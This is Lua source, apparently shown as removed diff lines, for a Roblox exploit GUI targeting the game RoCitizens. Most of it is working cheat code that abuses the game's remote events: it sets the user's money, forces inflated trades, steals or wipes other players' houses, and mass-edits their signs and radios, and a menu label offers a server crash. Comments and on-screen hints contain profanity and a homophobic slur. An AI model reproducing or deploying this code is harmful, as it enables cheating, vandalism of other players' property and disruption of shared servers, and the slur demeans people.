- Func13.BackgroundTransparency = 1
- Func13.Position = UDim2.new(0, 0, 0, 360)
- Func13.Size = UDim2.new(1, 0, 0, 25)
- House_2.Name = "House"
- House_2.Parent = Func13
- House_2.BackgroundColor3 = Color3.new(1, 1, 1)
- House_2.BackgroundTransparency = 1
- House_2.Position = UDim2.new(0, 3, 0, 0)
- House_2.Size = UDim2.new(0, 200, 0, 25)
- House_2.Font = Enum.Font.Bodoni
- House_2.Text = "Load House:"
- House_2.TextColor3 = Color3.new(0, 0, 0)
- House_2.TextSize = 17
- House_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- House_2.TextStrokeTransparency = 0.69999998807907
- House_2.TextWrapped = true
- House_2.TextXAlignment = Enum.TextXAlignment.Left
- HouseLoad.Name = "HouseLoad"
- HouseLoad.Parent = Func13
- HouseLoad.BackgroundColor3 = Color3.new(1, 1, 1)
- HouseLoad.Position = UDim2.new(0, 215, 0, 0)
- HouseLoad.Size = UDim2.new(0.25, 0, 0, 25)
- HouseLoad.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- HouseLoad.Font = Enum.Font.ArialBold
- HouseLoad.Text = "Load"
- HouseLoad.TextColor3 = Color3.new(1, 1, 1)
- HouseLoad.TextSize = 14
- HouseLoad.TextStrokeTransparency = 0
- HouseName_2.Name = "HouseName"
- HouseName_2.Parent = Func13
- HouseName_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- HouseName_2.BorderColor3 = Color3.new(0, 0, 0)
- HouseName_2.Position = UDim2.new(0, 90, 0, 0)
- HouseName_2.Size = UDim2.new(0, 120, 0, 25)
- HouseName_2.ClearTextOnFocus = false
- HouseName_2.Font = Enum.Font.Arial
- HouseName_2.Text = "House 1"
- HouseName_2.TextColor3 = Color3.new(1, 1, 1)
- HouseName_2.TextSize = 17
- HouseName_2.TextStrokeTransparency = 0
- Func14.Name = "Func14"
- Func14.Parent = Functions
- Func14.BackgroundColor3 = Color3.new(1, 1, 1)
- Func14.BackgroundTransparency = 1
- Func14.Position = UDim2.new(0, 0, 0, 390)
- Func14.Size = UDim2.new(1, 0, 0, 25)
- Signs.Name = "Signs"
- Signs.Parent = Func14
- Signs.BackgroundColor3 = Color3.new(1, 1, 1)
- Signs.BackgroundTransparency = 1
- Signs.Position = UDim2.new(0, 3, 0, 0)
- Signs.Size = UDim2.new(0, 200, 0, 25)
- Signs.Font = Enum.Font.Bodoni
- Signs.Text = "Set Signs:"
- Signs.TextColor3 = Color3.new(0, 0, 0)
- Signs.TextSize = 17
- Signs.TextStrokeColor3 = Color3.new(1, 1, 1)
- Signs.TextStrokeTransparency = 0.69999998807907
- Signs.TextWrapped = true
- Signs.TextXAlignment = Enum.TextXAlignment.Left
- SignsB.Name = "SignsB"
- SignsB.Parent = Func14
- SignsB.BackgroundColor3 = Color3.new(1, 1, 1)
- SignsB.Position = UDim2.new(0, 215, 0, 0)
- SignsB.Size = UDim2.new(0.25, 0, 0, 25)
- SignsB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- SignsB.Font = Enum.Font.ArialBold
- SignsB.Text = "Set"
- SignsB.TextColor3 = Color3.new(1, 1, 1)
- SignsB.TextSize = 14
- SignsB.TextStrokeTransparency = 0
- SignsText.Name = "SignsText"
- SignsText.Parent = Func14
- SignsText.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- SignsText.BorderColor3 = Color3.new(0, 0, 0)
- SignsText.Position = UDim2.new(0, 90, 0, 0)
- SignsText.Size = UDim2.new(0, 120, 0, 25)
- SignsText.ClearTextOnFocus = false
- SignsText.Font = Enum.Font.Arial
- SignsText.Text = "FalconPunch was here!"
- SignsText.TextColor3 = Color3.new(1, 1, 1)
- SignsText.TextScaled = true
- SignsText.TextSize = 17
- SignsText.TextStrokeTransparency = 0
- SignsText.TextWrapped = true
- Func15.Name = "Func15"
- Func15.Parent = Functions
- Func15.BackgroundColor3 = Color3.new(1, 1, 1)
- Func15.BackgroundTransparency = 1
- Func15.Position = UDim2.new(0, 0, 0, 420)
- Func15.Size = UDim2.new(1, 0, 0, 25)
- Crash.Name = "Crash"
- Crash.Parent = Func15
- Crash.BackgroundColor3 = Color3.new(1, 1, 1)
- Crash.BackgroundTransparency = 1
- Crash.Position = UDim2.new(0, 3, 0, 0)
- Crash.Size = UDim2.new(0, 200, 0, 25)
- Crash.Font = Enum.Font.Bodoni
- Crash.Text = "Crash the Fucking Server:"
- Crash.TextColor3 = Color3.new(0, 0, 0)
- Crash.TextSize = 17
- Crash.TextStrokeColor3 = Color3.new(1, 1, 1)
- Crash.TextStrokeTransparency = 0.69999998807907
- Crash.TextWrapped = true
- Crash.TextXAlignment = Enum.TextXAlignment.Left
- CrashB.Name = "CrashB"
- CrashB.Parent = Func15
- CrashB.BackgroundColor3 = Color3.new(1, 1, 1)
- CrashB.Position = UDim2.new(0, 185, 0, 0)
- CrashB.Size = UDim2.new(0.349999994, 0, 0, 25)
- CrashB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- CrashB.Font = Enum.Font.ArialBold
- CrashB.Text = "Crash"
- CrashB.TextColor3 = Color3.new(1, 1, 1)
- CrashB.TextSize = 14
- CrashB.TextStrokeTransparency = 0
- Players.Name = "Players"
- Players.Parent = Main
- Players.Active = true
- Players.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
- Players.BorderSizePixel = 0
- Players.Position = UDim2.new(1, 25, 0, 50)
- Players.Selectable = true
- Players.Size = UDim2.new(0, 300, 0, 90)
- Title_2.Name = "Title"
- Title_2.Parent = Players
- Title_2.BackgroundColor3 = Color3.new(1, 1, 1)
- Title_2.BackgroundTransparency = 1
- Title_2.Size = UDim2.new(1, 0, 0, 30)
- Title_2.Font = Enum.Font.Bodoni
- Title_2.Text = "Current Selected Player: None"
- Title_2.TextColor3 = Color3.new(0, 0, 0)
- Title_2.TextSize = 17
- Title_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- Title_2.TextStrokeTransparency = 0.69999998807907
- Title_2.TextXAlignment = Enum.TextXAlignment.Left
- Players_2.Name = "Players"
- Players_2.Parent = Players
- Players_2.Active = true
- Players_2.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
- Players_2.BackgroundTransparency = 1
- Players_2.BorderSizePixel = 0
- Players_2.Position = UDim2.new(0, 0, 0, 30)
- Players_2.Selectable = true
- Players_2.Size = UDim2.new(1, 0, 1, -60)
- AllPlayers.Name = "AllPlayers"
- AllPlayers.Parent = Players_2
- AllPlayers.BackgroundColor3 = Color3.new(1, 1, 1)
- AllPlayers.Size = UDim2.new(1, 0, 0, 25)
- AllPlayers.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- AllPlayers.Font = Enum.Font.ArialBold
- AllPlayers.Text = "Select all Players"
- AllPlayers.TextColor3 = Color3.new(1, 1, 1)
- AllPlayers.TextSize = 14
- AllPlayers.TextStrokeTransparency = 0
- PlayerBOX.Name = "PlayerBOX"
- PlayerBOX.Parent = Players_2
- PlayerBOX.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- PlayerBOX.BorderColor3 = Color3.new(0, 0, 0)
- PlayerBOX.Position = UDim2.new(0, 5, 0, 30)
- PlayerBOX.Size = UDim2.new(1, -10, 0, 25)
- PlayerBOX.Font = Enum.Font.Arial
- PlayerBOX.Text = "Enter Player Name"
- PlayerBOX.TextColor3 = Color3.new(1, 1, 1)
- PlayerBOX.TextSize = 17
- PlayerBOX.TextStrokeTransparency = 0
- end
- local serv = setmetatable({}, {
- __index = function(t, k)
- return game:GetService(k)
- end
- })
- local Plrs = serv.Players
- local Run = serv.RunService
- local RepStor = serv.ReplicatedStorage
- local CoreGui = serv.CoreGui
- local UserInput = serv.UserInputService
- local Http = serv.HttpService
- if game.PlaceId ~= 137877687 then
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "You fucking idiot, you need to be playing RoCitizens for this GUI"
- wait(10)
- Hint:Destroy()
- script.Parent:Destroy()
- end
- local MyPlr = Plrs.LocalPlayer
- local MyChar = MyPlr.Character
- warn("Waiting for MyMoney")
- local MyMoney do
- repeat wait() until MyPlr:FindFirstChild("Money")
- end
- MyMoney = MyPlr.Money
- warn("Waiting for ChangMoney")
- local ChangeMoney do
- repeat wait() until MyPlr:FindFirstChild("ChangeMoney")
- end
- ChangeMoney = MyPlr.ChangeMoney
- local RoCitizensGUI = CoreGui.RoCitizens
- local Msg = Instance.new("Hint", CoreGui)
- Msg.Text = "This script has been discontinued."
- wait(5)
- Msg:Destroy()
- local ComRelay = workspace.CommunicationRelays
- local CTrades = workspace.CurrentTrades
- local SelectedPlayer = Plrs:GetPlayers()[math.random(1, #Plrs:GetPlayers())]
- RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: " .. SelectedPlayer.Name
- local PermsExploit = false
- local ExplosivesExploit = false
- local LockpickExploit = false
- local AntiHouseDestroy = false
- local AntiHouseStealSign = nil
- function format_int(Num)
- local i, j, minus, int, fraction = tostring(Num):find("([-]?)(%d+)([.]?%d*)")
- int = int:reverse():gsub("(%d%d%d)", "%1,")
- return minus .. int:reverse():gsub("^,", "") .. fraction
- end
- function FindPlayer(Str)
- local Plr = { }
- for _, v in pairs(Plrs:GetPlayers()) do
- if string.lower(string.sub(v.Name, 1, string.len(Str))) == string.lower(Str) then
- table.insert(Plr, v)
- end
- end
- if #Plr == 1 then
- return Plr[1]
- else
- return nil
- end
- end
- function FindPlayersWithAHouse()
- local Players = { }
- local Properties = { }
- for _, v in next, workspace:GetChildren() do
- if v:IsA("Model") and v.Name == "Property" then
- table.insert(Properties, v:GetChildren())
- end
- end
- for _, v in next, Properties do
- local Find = v[1]:FindFirstChild("Owner")
- if Find then
- local FindPlr = Plrs:FindFirstChild(Find.Value)
- if FindPlr and FindPlr:IsA("Player") then
- table.insert(Players, FindPlr)
- end
- end
- end
- if #Players <= 0 then
- Players = nil
- end
- return Players
- end
- function FindEmptyProperty(Prop)
- local Properties = { }
- for _, v in next, workspace:GetChildren() do
- if v.Name == "Property" then
- local House = v:GetChildren()
- local GetPos = Vector3.new(Prop[1], Prop[2], Prop[3])
- if (House[1].Base.Position - GetPos).magnitude < 5 then
- local Find = House[1]:FindFirstChild("Owner")
- if not Find then
- table.insert(Properties, v)
- else
- workspace.CommunicationRelays.House.ResetProperty:FireServer(House[1])
- table.insert(Properties, v)
- end
- end
- end
- end
- return Properties
- end
- function FindHouse(Plr)
- local Properties = { }
- for _, v in next, workspace:GetChildren() do
- if v:IsA("Model") and v.Name == "Property" then
- table.insert(Properties, v:GetChildren())
- end
- end
- for _, v in next, Properties do
- local Find = v[1]:FindFirstChild("Owner")
- if Find then
- if Find.Value == Plr.Name then
- return v[1]
- end
- end
- end
- return nil
- end
- function GeneratePermsTable(Plr)
- local Tab = { }
- for _, v in next, Plrs:GetPlayers() do
- if v ~= Plr and v ~= MyPlr then
- Tab[v.Name] = {["Ban"] = false, ["Paint"] = false, ["Door"] = false}
- elseif v ~= Plr and v == MyPlr then
- Tab[v.Name] = {["Ban"] = false, ["Paint"] = true, ["Door"] = true}
- end
- end
- return Tab
- end
- function FlipLightSwitches(House)
- local StaticAssets = House.StaticAssets
- for _, v in next, StaticAssets:GetDescendants() do
- if v.Name == "SwitchV2" then
- ComRelay.Interaction.LightInteractV2:FireServer(v)
- end
- end
- end
- function OpenDoors(House)
- local StaticAssets = House.StaticAssets
- for _, v in next, StaticAssets:GetDescendants() do
- if v.Name == "Door" or v.Name == "GlassDoor" then
- ComRelay.Interaction.DoorInteract:FireServer(v)
- end
- end
- end
- function SendMessage(Plr, Msg) --ez
- ComRelay.Interclient.SendMessage:InvokeServer(Msg, Plr.Name)
- end
- function BuildHouse(Plr)
- local Building = true
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "Stealing house... This could take a while... and you might lag...)"
- SendMessage(Plr, "I stole your house. To get it back: reset character, and spawn it in again. I'm Sowwy. :(")
- local GetHouse = FindHouse(Plr)
- if not GetHouse then
- Hint.Text = "That player doesn't have a house!"
- wait(7)
- Hint:Destroy()
- return
- end
- MyPlr.Character.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
- repeat wait() until GetHouse.StaticAssets:FindFirstChild("Furniture")
- local GetFurniture = GetHouse.StaticAssets:FindFirstChild("Furniture")
- local TempFurniture = Instance.new("Folder", MyPlr)
- TempFurniture.Name = "TempFurniture"
- local GetColors = GetHouse.AestheticChanger.UpdateRequested
- local Table = { }
- Table["HouseType"] = GetHouse.Name
- Table["Furniture"] = { }
- Table["Variables"] = { }
- for i, v in next, GetFurniture:GetChildren() do
- local Clo = v:clone()
- Clo.Parent = TempFurniture
- end
- for i, v in next, GetColors:GetChildren() do
- Table["Variables"][v.Name] = v.Value
- end
- ComRelay.House.ResetProperty:FireServer(GetHouse)
- ComRelay.HomePurchase.House:InvokeServer(GetHouse.Parent, Table)
- AntiHouseDestroy = false
- RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(1, 0, 0)
- GetHouse = FindHouse(MyPlr)
- for i, v in next, TempFurniture:GetChildren() do
- Hint.Text = "Stealing house... placing furniture " .. i .. "/" .. #TempFurniture:GetChildren()
- local Item = v:FindFirstChild("Item")
- local Color = v:FindFirstChild("Color")
- if Item and Color then
- local Furn = workspace.CommunicationRelays.House.PlaceFurniture:InvokeServer(v.Name, v.PrimaryPart.CFrame, GetHouse, Item.Value, Color.Value)
- if v.Name == "SS_Wooden Sign" then
- workspace.CommunicationRelays.Interaction.EditSign:FireServer(Furn, v.Plaque.SurfaceGui.TextLabel.Text)
- end
- else
- local Color1 = v:FindFirstChild("Color1")
- local Color2 = v:FindFirstChild("Color2")
- local Display = v:FindFirstChild("Display")
- if Color1 and Color2 and Display then
- workspace.CommunicationRelays.House.PlaceFurniture:InvokeServer(v.Name, v.PrimaryPart.CFrame, GetHouse, Item.Value, {["Display"] = Display.Value, ["Color1"] = Color1.Value, ["Color2"] = Color2.Value})
- end
- end
- game:GetService("RunService").RenderStepped:wait()
- end
- TempFurniture:Destroy()
- MyPlr.PlayerGui.Main.MyHouse.Value = GetHouse
- FlipLightSwitches(GetHouse)
- Building = false
- Hint.Text = "House copied, and spawned. Place some furniture to save it to server."
- wait(10)
- Hint:Destroy()
- end
- function DestroyHouse(Plr, House)
- if House == nil then
- House = FindHouse(Plr)
- end
- if House ~= nil then
- MyPlr.Character.HumanoidRootPart.CFrame = CFrame.new(House.Base.Position + Vector3.new(0, 5, 0))
- repeat
- MyPlr.Character.HumanoidRootPart.CFrame = CFrame.new(House.Base.Position + Vector3.new(0, 5, 0))
- Run.RenderStepped:wait()
- until House.StaticAssets:FindFirstChild("Furniture")
- local Furn = House.StaticAssets.Furniture
- for _, v in next, Furn:GetChildren() do
- if v.Name == "SS_Wooden Sign" then
- if v.Plaque.SurfaceGui.TextLabel.Text == "can't steal house" then
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "CANNOT DESTROY " .. Plr.Name .. "'s HOUSE THEIR ALSO USING THIS GUI <3"
- wait(10)
- Hint:Destroy()
- return
- end
- end
- end
- ComRelay.House.ResetProperty:FireServer(House)
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "Destroyed: " .. SelectedPlayer.Name .. "'s house. You fucking dick."
- wait(10)
- Hint:Destroy()
- if Plr == MyPlr then
- MyPlr.PlayerGui.Main.MyHouse.Value = nil
- end
- end
- end
- function DonateExploit(Plr, Amount)
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "Sent " .. Plr.Name .. " a trade request. Awaiting response..."
- if Plr.Money.Value == Amount or Plr.Money.Value > Amount then
- Hint.Text = "Unable to trade, " .. Plr.Name .. " already has that amount of money!"
- wait(7)
- Hint:Destroy()
- else
- local Response, TradeId = ComRelay.Interclient.RequestTrade:InvokeServer(Plr.Name)
- if Response and Response == "Accept" then
- Hint.Text = "Trade accepted, and hacked donation amount awaiting " .. Plr.Name .. "'s response."
- local Math = (Amount - Plr.Money.Value)
- ComRelay.Interclient.TradeStart:InvokeServer(Plr.Name, TradeId)
- ComRelay.Interclient.TradeUpdate:InvokeServer(TradeId, Math, "Money")
- repeat wait() until CTrades:FindFirstChild(TradeId)
- repeat
- ComRelay.Interclient.TradeAccept:FireServer(TradeId)
- wait(1)
- until not CTrades:FindFirstChild(TradeId)
- Hint.Text = "Sent " .. Plr.Name .. " $" .. format_int(Math)
- wait(5)
- Hint:Destroy()
- elseif Response == "Busy" then
- Hint.Text = Plr.Name .. " is busy with another trade."
- wait(6)
- Hint:Destroy()
- else
- Hint.Text = Plr.Name .. " declined trade. Money not sent."
- wait(5)
- Hint:Destroy()
- end
- end
- end
- function StealHouse()
- local IHaveAHouse = FindHouse(MyPlr)
- if IHaveAHouse then
- DestroyHouse(MyPlr, IHaveAHouse)
- end
- BuildHouse(SelectedPlayer)
- end
- function EquipItem(Item)
- ComRelay.Character.ItemEquip:FireServer("JobAssets", Item, Item)
- end
- function SaveHouse(HouseName)
- local GetHouse = FindHouse(SelectedPlayer)
- if not GetHouse then
- return
- end
- MyChar.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
- repeat
- MyChar.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
- wait()
- until GetHouse.StaticAssets:FindFirstChild("Furniture")
- local Furn = GetHouse.StaticAssets.Furniture
- local Colors = GetHouse.AestheticChanger.UpdateRequested
- local SaveData = { }
- SaveData["HouseType"] = GetHouse.Name
- SaveData["Furniture"] = { } -- Going to be nil.
- SaveData["Variables"] = { }
- SaveData["FurnData"] = { }
- SaveData["Prop"] = {GetHouse.Base.Position.X, GetHouse.Base.Position.Y, GetHouse.Base.Position.Z}
- for i, v in next, Furn:GetChildren() do
- SaveData["FurnData"][v.Name .. i] = { }
- local Item, Color = v:FindFirstChild("Item"), v:FindFirstChild("Color")
- if Item and Color then
- SaveData["FurnData"][v.Name .. i]["Name"] = v.Name
- SaveData["FurnData"][v.Name .. i]["Item"] = Item.Value
- SaveData["FurnData"][v.Name .. i]["Color"] = Color.Value
- SaveData["FurnData"][v.Name .. i]["CFrame"] = {v.PrimaryPart.CFrame:components()}
- if v.Name == "SS_Wooden Sign" then
- SaveData["FurnData"][v.Name .. i]["Text"] = v.Plaque.SurfaceGui.TextLabel.Text
- end
- else
- local Color1 = v:FindFirstChild("Color1")
- local Color2 = v:FindFirstChild("Color2")
- local Display = v:FindFirstChild("Display")
- local Item = v:FindFirstChild("Item")
- if Color1 and Color2 and Display and Item then
- SaveData["FurnData"][v.Name .. i]["Item"] = Item.Value
- SaveData["FurnData"][v.Name .. i]["Color1"] = Color1.Value
- SaveData["FurnData"][v.Name .. i]["Color2"] = Color2.Value
- SaveData["FurnData"][v.Name .. i]["Display"] = Display.Value
- SaveData["FurnData"][v.Name .. i]["CFrame"] = {v.PrimaryPart.CFrame:components()}
- end
- end
- end
- for _, v in next, Colors:GetChildren() do
- SaveData["Variables"][v.Name] = v.Value
- end
- pcall(function() writefile(HouseName .. ".txt", Http:JSONEncode(SaveData)) end)
- pcall(function() Synapse:WriteFile(HouseName .. ".txt", Http:JSONEncode(SaveData)) end)
- local hint = Instance.new("Hint", game.CoreGui)
- hint.Text = "House Saved to file: " .. HouseName
- wait(5)
- hint:Destroy()
- end
- function LoadHouse(HouseName)
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "Loading house: " .. HouseName
- local HouseData = nil
- local Succ = pcall(function() HouseData = readfile(HouseName .. ".txt") end)
- if not Succ then
- local Succ2 = pcall(function() HouseData = readfile(HouseName .. ".txt") end)
- if not Succ2 then
- Hint:Destroy()
- return
- end
- end
- HouseData = Http:JSONDecode(HouseData)
- local GetAProperty = FindEmptyProperty(HouseData.Prop)
- if #GetAProperty > 1 then
- GetAProperty = GetAProperty[math.random(1, #GetAProperty)]
- else
- GetAProperty = GetAProperty[1]
- end
- if GetAProperty == nil then
- return
- end
- local GetHouse = FindHouse(MyPlr)
- if GetHouse then
- ComRelay.House.ResetProperty:FireServer(GetHouse)
- AntiHouseDestroy = false
- RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(1, 0, 0)
- end
- workspace.CommunicationRelays.HomePurchase.House:InvokeServer(GetAProperty, {["HouseType"] = HouseData["HouseType"], ["Furniture"] = { }, ["Variables"] = HouseData["Variables"]})
- wait(0.5)
- GetHouse = FindHouse(MyPlr)
- local Num = 1
- for i, v in next, HouseData.FurnData do
- Hint.Text = "Loading house: " .. HouseName .. " " .. Num .. "/" .. #HouseData.FurnData
- if v.Color ~= nil then
- local C = CFrame.new(v.CFrame[1], v.CFrame[2], v.CFrame[3], v.CFrame[4], v.CFrame[5], v.CFrame[6], v.CFrame[7], v.CFrame[8], v.CFrame[9], v.CFrame[10], v.CFrame[11], v.CFrame[12])
- local sexy_bitch = workspace.CommunicationRelays.House.PlaceFurniture:InvokeServer(v.Name, C, GetHouse, v.Item, v.Color)
- if sexy_bitch.Name == "SS_Wooden Sign" then
- ComRelay.Interaction.EditSign:FireServer(sexy_bitch, v.Text)
- end
- else
- local C = CFrame.new(v.CFrame[1], v.CFrame[2], v.CFrame[3], v.CFrame[4], v.CFrame[5], v.CFrame[6], v.CFrame[7], v.CFrame[8], v.CFrame[9], v.CFrame[10], v.CFrame[11], v.CFrame[12])
- ComRelay.House.PlaceFurniture:InvokeServer(v.Name, C, GetHouse, v.Item, {["Display"] = v.Display, ["Color1"] = v.Color1, ["Color2"] = v.Color2})
- end
- Num = Num + 1
- end
- MyPlr.PlayerGui.Main.MyHouse.Value = GetHouse
- MyChar.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
- Hint.Text = "House loaded. :)"
- wait(5)
- Hint:Destroy()
- end
- RoCitizensGUI.Main.Players.Players.PlayerBOX.FocusLost:connect(function()
- local Plr = FindPlayer(RoCitizensGUI.Main.Players.Players.PlayerBOX.Text)
- if Plr then
- SelectedPlayer = Plr
- RoCitizensGUI.Main.Players.Players.PlayerBOX.Text = Plr.Name
- RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: " .. Plr.Name
- else
- RoCitizensGUI.Main.Players.Players.PlayerBOX.Text = "Enter Player Name"
- end
- end)
- RoCitizensGUI.Main.Players.Players.AllPlayers.MouseButton1Click:connect(function()
- SelectedPlayer = "Everyone"
- RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: Everyone"
- end)
- RoCitizensGUI.Main.Functions.Func3.Teleport.MouseButton1Click:connect(function()
- local MyChar = MyPlr.Character
- local TheirChar = nil
- if SelectedPlayer ~= "Everyone" then
- TheirChar = SelectedPlayer.Character
- if MyChar and TheirChar then
- local MyTor = MyChar.HumanoidRootPart
- local TheirTor = TheirChar.HumanoidRootPart
- MyTor.CFrame = TheirTor.CFrame * CFrame.new(Vector3.new(0, 0, 2))
- end
- else
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "Selected Player cannot be everyone!"
- wait(5)
- Hint:Destroy()
- end
- end)
- RoCitizensGUI.Main.Functions.Func1.MoneyBox.FocusLost:connect(function()
- local Num = tonumber(RoCitizensGUI.Main.Functions.Func1.MoneyBox.Text) or 0
- if Num > 2147483647 then
- Num = 2147483647
- end
- if Num < -2147483647 then
- Num = -2147483647
- end
- RoCitizensGUI.Main.Functions.Func1.MoneyVal.Value = Num
- RoCitizensGUI.Main.Functions.Func1.MoneyBox.Text = "$" .. format_int(Num)
- end)
- RoCitizensGUI.Main.Functions.Func2.MoneyBox.FocusLost:connect(function()
- local Num = tonumber(RoCitizensGUI.Main.Functions.Func2.MoneyBox.Text) or 0
- if Num > 2147483647 then
- Num = 2147483647
- end
- if Num < 0 then -- Don't be a fucking dick head faggot.
- Num = 1
- end
- RoCitizensGUI.Main.Functions.Func2.MoneyVal.Value = Num
- RoCitizensGUI.Main.Functions.Func2.MoneyBox.Text = "$" .. format_int(Num)
- end)
- RoCitizensGUI.Main.Functions.Func1.SetMoney.MouseButton1Click:connect(function()
- local Math = RoCitizensGUI.Main.Functions.Func1.MoneyVal.Value - MyMoney.Value
- ChangeMoney:Fire(Math)
- end)
- RoCitizensGUI.Main.Functions.Func2.SendMoney.MouseButton1Click:connect(function()
- if SelectedPlayer ~= "Everyone" and SelectedPlayer ~= MyPlr then
- DonateExploit(SelectedPlayer, RoCitizensGUI.Main.Functions.Func2.MoneyVal.Value)
- else
- for _, v in next, Plrs:GetPlayers() do
- if v ~= MyPlr then
- if v:FindFirstChild("Money") then
- DonateExploit(v, RoCitizensGUI.Main.Functions.Func2.MoneyVal.Value)
- end
- end
- end
- end
- end)
- RoCitizensGUI.Main.Functions.Func4.Teleport.MouseButton1Click:connect(function()
- if SelectedPlayer ~= "Everyone" and SelectedPlayer ~= MyPlr then
- StealHouse()
- else
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "Cannot steal everyone's house!"
- wait(5)
- Hint:Destroy()
- end
- end)
- RoCitizensGUI.Main.Functions.Func5.DestroyBut.MouseButton1Click:connect(function()
- DestroyHouse(SelectedPlayer)
- end)
- RoCitizensGUI.Main.Functions.Func6.Change.MouseButton1Click:connect(function()
- local id = tonumber(RoCitizensGUI.Main.Functions.Func6.AudioBox.Text) or 856173428
- local MyChar = MyPlr.Character
- local MyTor = MyChar.HumanoidRootPart
- local SavePos = MyTor.CFrame
- local GetHousePlrs = FindPlayersWithAHouse()
- for _, v in next, GetHousePlrs do
- local TheirHouse = FindHouse(v)
- if TheirHouse then
- MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
- repeat
- if not TheirHouse:FindFirstChild("Owner") then
- break
- end
- MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
- Run.RenderStepped:wait()
- until TheirHouse.StaticAssets:FindFirstChild("Furniture")
- if not TheirHouse:FindFirstChild("Owner") then
- return
- end
- for _, vv in next, TheirHouse.StaticAssets.Furniture:GetChildren() do
- if vv.Name:find("VC_Radio") or vv.Name:find("VC_Stereo") then
- ComRelay.Interaction.ChangeSound:FireServer(vv, tostring(id))
- game.StarterGui.RoRadio.RemoveSystem:Fire(vv)
- end
- end
- end
- end
- MyTor.CFrame = SavePos
- end)
- RoCitizensGUI.Main.Functions.Func14.SignsB.MouseButton1Click:connect(function()
- local MyChar = MyPlr.Character
- local MyTor = MyChar.HumanoidRootPart
- local SavePos = MyTor.CFrame
- local GetHousePlrs = FindPlayersWithAHouse()
- for _, v in next, GetHousePlrs do
- local TheirHouse = FindHouse(v)
- if TheirHouse then
- MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
- repeat
- if not TheirHouse:FindFirstChild("Owner") then
- break
- end
- MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
- Run.RenderStepped:wait()
- until TheirHouse.StaticAssets:FindFirstChild("Furniture")
- if not TheirHouse:FindFirstChild("Owner") then
- return
- end
- for _, vv in next, TheirHouse.StaticAssets.Furniture:GetChildren() do
- if vv.Name == "SS_Wooden Sign" then
- ComRelay.Interaction.EditSign:FireServer(vv, RoCitizensGUI.Main.Functions.Func14.SignsText.Text)
- end
- end
- end
- end
- MyTor.CFrame = SavePos
- end)
- RoCitizensGUI.Main.Functions.Func7.Permissions.MouseButton1Click:connect(function()
- PermsExploit = not PermsExploit
- if PermsExploit then
- RoCitizensGUI.Main.Functions.Func7.Permissions.Text = "ON"
- RoCitizensGUI.Main.Functions.Func7.Permissions.TextColor3 = Color3.new(0, 1, 0)
- else
- RoCitizensGUI.Main.Functions.Func7.Permissions.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func7.Permissions.TextColor3 = Color3.new(1, 0, 0)
- end
- end)
- RoCitizensGUI.Main.Functions.Func8.Lockpick.MouseButton1Click:connect(function()
- LockpickExploit = not LockpickExploit
- ExplosivesExploit = false
- if LockpickExploit then
- RoCitizensGUI.Main.Functions.Func8.Lockpick.Text = "ON"
- RoCitizensGUI.Main.Functions.Func8.Lockpick.TextColor3 = Color3.new(0, 1, 0)
- RoCitizensGUI.Main.Functions.Func9.Explosives.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func9.Explosives.TextColor3 = Color3.new(1, 0, 0)
- else
- RoCitizensGUI.Main.Functions.Func8.Lockpick.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func8.Lockpick.TextColor3 = Color3.new(1, 0, 0)
- end
- end)
- RoCitizensGUI.Main.Functions.Func9.Explosives.MouseButton1Click:connect(function()
- ExplosivesExploit = not ExplosivesExploit
- LockpickExploit = false
- if ExplosivesExploit then
- RoCitizensGUI.Main.Functions.Func9.Explosives.Text = "ON"
- RoCitizensGUI.Main.Functions.Func9.Explosives.TextColor3 = Color3.new(0, 1, 0)
- RoCitizensGUI.Main.Functions.Func8.Lockpick.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func8.Lockpick.TextColor3 = Color3.new(1, 0, 0)
- else
- RoCitizensGUI.Main.Functions.Func9.Explosives.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func9.Explosives.TextColor3 = Color3.new(1, 0, 0)
- end
- end)
- RoCitizensGUI.Main.Functions.Func10.Clothes.MouseButton1Click:connect(function()
- for _, v in next, RepStor.Shirt:GetChildren() do
- MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
- end
- for _, v in next, RepStor.Pants:GetChildren() do
